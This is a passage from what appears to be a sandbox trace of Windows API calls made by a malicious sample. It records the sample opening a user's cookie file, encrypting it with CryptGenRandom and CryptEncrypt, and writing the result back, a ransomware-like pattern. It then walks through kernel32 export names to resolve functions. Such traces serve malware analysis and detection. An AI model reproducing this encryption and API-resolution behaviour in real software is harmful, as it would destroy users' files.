HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" [0078.772] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.773] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=83) returned 1 [0078.773] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.773] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.773] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.774] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.774] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.775] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.775] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.776] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.776] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.779] CloseHandle (hObject=0x45c) returned 1 [0078.779] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.779] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.780] CloseHandle (hObject=0x0) returned 0 [0078.780] CloseHandle (hObject=0x458) returned 1 [0078.780] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.781] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.781] GetTickCount () returned 0x114c311 [0078.781] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.781] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.781] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.782] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.782] lstrlenA (lpString="kernel32.dll") returned 12 [0078.782] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.782] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.782] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.782] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.782] lstrlenA (lpString="ADDATOMA") returned 8 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.782] lstrlenA (lpString="ADDATOMW") returned 8 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.782] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.782] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.782] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.782] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.782] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.782] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.783] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.783] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.783] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.783] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.783] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.783] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.783] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.783] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.783] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.783] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.783] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.783] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.783] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.783] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.783] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.783] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.783] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.783] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.783] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.783] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.784] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.784] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.784] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.784] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.784] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.784] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.784] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.784] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.784] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.784] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.784] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.784] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.784] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.784] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.784] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.784] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.784] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.784] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.784] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.785] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.785] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.785] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.785] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.785] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.785] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.785] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.785] lstrlenA (lpString="BEEP") returned 4 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.785] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.785] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.785] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.785] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.785] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.785] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.785] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.785] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.785] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.785] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.785] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.786] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.786] lstrlenA (lpString="CANCELIO") returned 8 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.786] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.786] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.786] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.786] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.786] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.786] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.786] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.786] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.786] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.786] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.786] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.786] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.786] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.786] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.786] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.786] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.786] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.786] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.787] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.787] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.787] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.787] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.787] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.787] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.787] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.787] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.787] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.787] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.787] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.787] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.787] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.787] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.787] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.787] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.787] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.787] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.787] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.788] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.788] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.788] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.788] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 